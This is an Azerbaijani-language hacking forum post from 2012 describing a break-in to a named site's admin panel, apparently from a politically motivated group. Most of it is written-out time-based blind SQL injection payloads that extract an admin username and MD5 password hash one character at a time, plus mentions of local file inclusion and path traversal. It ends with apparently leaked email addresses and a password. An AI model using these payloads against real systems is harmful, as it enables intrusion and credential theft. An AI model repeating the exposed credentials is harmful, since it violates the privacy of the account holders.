Istifadəçi |
2012-08-01 19:42 GMT |
|
|
|
Pr0grammer |
|
Mesaj Sayı : 1677 |
Mövzu Sayı : |
Rep Ver : |
Rep Sayı : 62 |
Indi Saytda : |
Cinsiyyət : Oğlan |
|
Şəhər : KARABAKH IS AZERBAIJAN! |
Ölkə : |
Məslək : |
Yaş : |
Mesaj : |
|
O cms-də BOT_25 verdiyində LFİ+AUTH bypass da var login.php-də amma problem yarada bilir funksiyanın birində xüsüsi simvolu qəbul eləmir deyə buraxmır içəri.
İşdir içəri girmək üçün BliNd Rulez:
LFI nəyə görə keçmədi orda Mod sec qoymadı mane oldu pathları traverse etməyə ../../ kimi tüpürdüm indexlədim getdi
Əsas bu elə 2 metoddur kifayətdir İMHO.
Lfi-dakı BOT_25-ə demişəm hardadır hardakı
?page=
gördünüz orda vulnerabledir.
Kod: ' or (select if(length(username)>'5',sleep(10),0) from pass)-- AND 5='5
http://coalition.byte.am/admin/admin.php?err=1
//TRUE
' or (select if(length(username)='4',sleep(10),0) from pass limit 1)-- AND 5='5
' or (select if(username='byte',sleep(10),0) from pass limit 1)-- AND 5='5
' or (select if(substr(username,1,1)='a',sleep(10),0) from pass limit 1)-- AND 5='5
Login ucun:
1-ci simvol: c
username=' or (select if(substr(username,1,1)='c',sleep(50),0) from pass limit 1)-- AND 5='5&psw=sss&Submit=Enter
2-ci simvol: s
username=' or (select if(substr(username,2,1)='s',sleep(50),0) from pass limit 1)-- AND 5='5&psw=sss&Submit=Enter
3-cu simvol: v
username=' or (select if(substr(username,3,1)='v',sleep(50),0) from pass limit 1)-- AND 5='5&psw=sss&Submit=Enter
4-cu simvol: w
username=' or (select if(substr(username,4,1)='w',sleep(50),0) from pass limit 1)-- AND 5='5&psw=sss&Submit=Enter
Login: csvw
//TRUE
username=' or (select if(substr(username,1,5)='csvw',sleep(50),0) from pass limit 1)-- AND 5='5&psw=sss&Submit=Enter
passi cekek:
//TRUE
username=' or (select if(length(`password`)='32',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
MD5 dir.
PASS:
--------------------------------------------------------------
1ci simvolu: b
username=' or (select if(substr(`password`,1,1)='b',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
2-ci simvolu: e
username=' or (select if(substr(`password`,2,1)='e',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
3-cu simvolu: 3
username=' or (select if(substr(`password`,3,1)='3',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
4-cu simvol: 2
username=' or (select if(substr(`password`,4,1)='2',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
5-c simvol: c
username=' or (select if(substr(`password`,5,1)='c',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
6-ci simvol: d
username=' or (select if(substr(`password`,6,1)='d',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
7-ci simvol: 6
username=' or (select if(substr(`password`,7,1)='6',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
8-ci simvol: e
username=' or (select if(substr(`password`,8,1)='e',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
9-cu simvol: 8
username=' or (select if(substr(`password`,9,1)='8',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
10-cu simvol: 8
username=' or (select if(substr(`password`,10,1)='8',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
11-ci simvol: 8
username=' or (select if(substr(`password`,11,1)='8',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
12-ci simvol: a
username=' or (select if(substr(`password`,12,1)='a',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
13-cu simvol: 0
username=' or (select if(substr(`password`,13,1)='0',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
14-cu simvol: f
username=' or (select if(substr(`password`,14,1)='f',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
15-ci simvol: 7
username=' or (select if(substr(`password`,15,1)='7',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
16-ci simvol: 6
username=' or (select if(substr(`password`,16,1)='6',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
17-ci simvol: d
username=' or (select if(substr(`password`,17,1)='d',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
18-ci simvol: 6
username=' or (select if(substr(`password`,18,1)='6',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
19-cu simvol: c
username=' or (select if(substr(`password`,19,1)='c',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
20-ci simvol: a
username=' or (select if(substr(`password`,20,1)='a',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
21-ci simvol: e
username=' or (select if(substr(`password`,21,1)='e',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
22-ci simvol: a
username=' or (select if(substr(`password`,22,1)='a',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
23-cu simvol: 2
username=' or (select if(substr(`password`,23,1)='2',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
24-cu simvol: 9
username=' or (select if(substr(`password`,24,1)='9',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
25-ci simvol: e
username=' or (select if(substr(`password`,25,1)='e',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
26-ci simvol: d
username=' or (select if(substr(`password`,26,1)='d',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
27-ci simvol: 2
username=' or (select if(substr(`password`,27,1)='2',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
28-ci simvol: 3
username=' or (select if(substr(`password`,28,1)='3',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
29-cu simvol: 6
username=' or (select if(substr(`password`,29,1)='6',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
30-ci simvol: 5 (yoxla sonra)
username=' or (select if(substr(`password`,30,1)='5',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
31-ci simvol: 4
username=' or (select if(substr(`password`,31,1)='4',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
32-ci simvol: 7
username=' or (select if(substr(`password`,32,1)='7',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
--------------------------------------------------------------
Login: csvw
MD5 HASH: be32cd6e888a0f76d6caea29ed236547
Yoxlanis:
//TRUE
username=' or (select if(substr(`password`,1,33)='be32cd6e888a0f76d6caea29ed236547',sleep(50),0) from pass where username='csvw')-- AND 5='5&psw=sss&Submit=Enter
csvw.armenia@gmail.com
zaruhi90
pinkarmenia@gmail.com
|
Anti-armenia.ORG |
|